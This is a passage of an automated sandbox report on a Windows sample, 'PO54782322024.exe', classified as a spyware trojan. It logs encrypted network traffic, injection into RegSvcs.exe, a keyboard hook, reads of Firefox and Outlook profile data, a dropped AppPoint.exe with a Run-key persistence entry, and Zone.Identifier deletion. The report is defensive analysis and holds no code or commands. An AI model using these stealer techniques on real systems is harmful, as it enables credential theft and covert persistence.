                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                        Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49861 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49881 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49882 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49908 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49909 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49915 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49921 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49946 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49948 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49969 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50000 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50028 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50029 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50030 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50032 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50034 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50035 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50036 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50037 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B87A3D00_2_00007FFD9B87A3D0
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B87D34D0_2_00007FFD9B87D34D
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B8832BC0_2_00007FFD9B8832BC
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B872A2C0_2_00007FFD9B872A2C
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B87A7B10_2_00007FFD9B87A7B1
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B87F5190_2_00007FFD9B87F519
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B87BC7A0_2_00007FFD9B87BC7A
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B8833090_2_00007FFD9B883309
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B9500500_2_00007FFD9B950050
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FF40C82_2_00FF40C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FFC02D2_2_00FFC02D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FFF2C02_2_00FFF2C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FF44102_2_00FF4410
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00FF4CE02_2_00FF4CE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050029582_2_05002958
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050029682_2_05002968
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063D36002_2_063D3600
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063D82B82_2_063D82B8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063DD0582_2_063DD058
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063DBC582_2_063DBC58
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063D58D82_2_063D58D8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063D69802_2_063D6980
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063DF6882_2_063DF688
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063D00402_2_063D0040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063D60432_2_063D6043
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063D00172_2_063D0017
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6844 -s 1068
                        Source: PO54782322024.exeStatic PE information: No import functions for PE file found
                        Source: PO54782322024.exe, 00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename568664f0-e437-4bb6-b6aa-41143e0997d7.exe4 vs PO54782322024.exe
                        Source: PO54782322024.exe, 00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePatekPorot.exe4 vs PO54782322024.exe
                        Source: PO54782322024.exe, 00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUyuximizefomusoboce2 vs PO54782322024.exe
                        Source: PO54782322024.exe, 00000000.00000002.1904832699.0000017F04610000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUyuximizefomusoboce2 vs PO54782322024.exe
                        Source: PO54782322024.exeBinary or memory string: OriginalFilenamePatekPorot.exe4 vs PO54782322024.exe
                        Source: PO54782322024.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9990080887770137
                        Source: PO54782322024.exe, ------------------.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@9/12@3/2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\AppPointJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
                        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6844
                        Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\c14a4b33-77eb-45ab-9dad-2ed2a2443202Jump to behavior
                        Source: PO54782322024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: PO54782322024.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: PO54782322024.exeReversingLabs: Detection: 47%
                        Source: PO54782322024.exeVirustotal: Detection: 48%
                        Source: C:\Users\user\Desktop\PO54782322024.exeFile read: C:\Users\user\Desktop\PO54782322024.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\PO54782322024.exe "C:\Users\user\Desktop\PO54782322024.exe"
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6844 -s 1068
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\PO54782322024.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: PO54782322024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: PO54782322024.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\user\Desktop\PO54782322024.PDB source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F0439D000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F0439D000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb*+T source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdbRSDS source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: System.pdb`w. source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: RegSvcs.pdb, source: AppPoint.exe, 00000006.00000000.1791457850.0000000000DA2000.00000002.00000001.01000000.00000009.sdmp, AppPoint.exe.2.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0K source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: RegSvcs.pdb source: AppPoint.exe, 00000006.00000000.1791457850.0000000000DA2000.00000002.00000001.01000000.00000009.sdmp, AppPoint.exe.2.dr
                        Source: Binary string: .pdbHJ source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbnt[ source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbuery actR source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: System.Core.ni.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: C:\Users\user\Desktop\PO54782322024.exe11-F424491E3931}\InprocServer32objr\x86\Microsoft.VisualBasic.pdb64\v4.0.30319\diasymreader.dll source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb13 source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: System.Core.pdbPD source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb~?5 source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: mscorlib.pdbP source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: 9nlpC:\Users\user\Desktop\PO54782322024.PDB source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: PO54782322024.PDB source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER3F0B.tmp.dmp.5.dr
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B87D34D pushad ; retf FFEEh0_2_00007FFD9B87D55E
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B8790CA pushad ; retf 0_2_00007FFD9B8790E9
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B950050 push esp; retf 4810h0_2_00007FFD9B950312
                        Source: C:\Users\user\Desktop\PO54782322024.exeCode function: 0_2_00007FFD9B951959 push ecx; iretd 0_2_00007FFD9B951962
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppPointJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppPointJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
